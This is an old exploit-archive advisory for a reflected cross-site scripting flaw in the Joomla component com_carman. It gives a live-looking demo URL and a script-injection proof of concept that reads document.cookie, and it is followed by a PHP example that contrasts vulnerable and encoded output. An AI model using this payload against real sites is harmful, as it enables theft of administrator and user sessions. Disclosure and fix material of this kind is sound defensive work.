
joomlacarman-xss.txt

Posted on 23 December 2009

< ------------------- header data start ------------------- >

#####################################################################
Joomla Component com_carman Cross Site Scripting Vulnerability
####################################################################
# author : Fl0riX
# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name : com_carman
# Bug Type : Cross Site Scripting
# Infection : Administrator and user cookies can be stolen.
# Bug Fix Advice : Harmful characters should be filtered.
# Demo Vuln. : http://carman.webformatique.com/index.php?option=com_carman&msg=[XSS CODE]
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

< -- bug code end of -- >
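The fix advice above, shown as an added example that is not part of the original advisory and not com_carman's own code: the `msg` value from the proof of concept rendered once without encoding and once with output encoding. The advisory does not show the component's template, so the attribute markup, the length limit and the function names `read_msg`, `render_msg_vulnerable` and `render_msg_hardened` are assumptions.

```php
<?php
// Added example, not com_carman's code. The advisory does not show how the
// component prints "msg"; the attribute markup below is an assumption that
// matches the "> breakout at the start of the proof of concept.

const MSG_MAX_LEN = 200; // assumed limit for a short status message

// Read the parameter defensively: msg[]=x arrives as an array, so anything
// that is not a string is treated as absent; overlong values are cut.
function read_msg(array $query): string
{
    $raw = $query['msg'] ?? '';
    if (!is_string($raw)) {
        return '';
    }
    return substr($raw, 0, MSG_MAX_LEN);
}

// Vulnerable form: raw input concatenated into an HTML attribute.
function render_msg_vulnerable(string $msg): string
{
    return '<input type="hidden" name="msg" value="' . $msg . '">';
}

// Hardened form: encode at output time for the HTML context.
// ENT_QUOTES encodes both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of making htmlspecialchars() return an empty string.
function render_msg_hardened(string $msg): string
{
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="msg" value="' . $safe . '">';
}

// Query string from the advisory's proof of concept, parsed like $_GET.
parse_str('option=com_carman&msg="><script>alert(document.cookie)</script>', $query);
$msg = read_msg($query);

echo render_msg_vulnerable($msg), PHP_EOL; // script element reaches the page
echo render_msg_hardened($msg), PHP_EOL;   // payload is inert text in value=""
```

Encoding at output is what neutralises the payload; the type and length checks only narrow what reaches the template.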

 
